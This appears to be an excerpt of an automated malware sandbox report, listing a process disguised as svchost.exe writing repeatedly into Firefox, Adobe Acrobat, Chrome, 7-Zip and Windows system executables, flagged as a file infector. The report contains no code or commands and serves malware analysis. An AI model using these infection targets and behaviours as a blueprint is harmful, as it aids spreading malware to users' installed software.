              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Infects executable files (exe, dll, sys, html)
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
